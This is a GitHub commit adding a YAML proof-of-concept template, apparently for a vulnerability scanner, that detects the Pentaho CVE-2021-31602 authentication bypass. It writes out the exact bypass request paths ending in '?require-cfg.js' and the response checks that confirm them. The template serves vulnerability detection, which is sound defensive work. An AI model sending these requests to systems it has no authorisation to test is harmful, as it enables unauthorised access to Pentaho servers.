Pentaho CVE-2021-31602 (chaitin#1505)

* Update and rename pentaho-cve-2021-31602.yml to pentaho-cve-2021-31602-authentication-bypass.yml Co-authored-by: smile-jpg <[email protected]>
kylincodelab · Nov 18, 2021 · 40a13b3 · 40a13b3
1 parent 059034a
commit 40a13b3
Showing 1 changed file with 25 additions and 0 deletions.
diff --git a/pocs/pentaho-cve-2021-31602-authentication-bypass.yml b/pocs/pentaho-cve-2021-31602-authentication-bypass.yml
@@ -0,0 +1,25 @@
+name: poc-yaml-pentaho-cve-2021-31602-authentication-bypass
+manual: true
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /pentaho/api/userrolelist/systemRoles?require-cfg.js
+            follow_redirects: false
+        expression: response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"<roles>Anonymous</roles></roleList>")
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /api/userrolelist/systemRoles?require-cfg.js
+            follow_redirects: false
+        expression: response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"<roles>Anonymous</roles></roleList>")
+expression: r0() || r1()
+detail:
+    author: For3stCo1d (https://github.com/For3stCo1d)
+    description: "Pentaho-authentication-bypass"
+    links:
+        - https://packetstormsecurity.com/files/164784/Pentaho-Business-Analytics-Pentaho-Business-Server-9.1-Authentication-Bypass.html
+        - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31602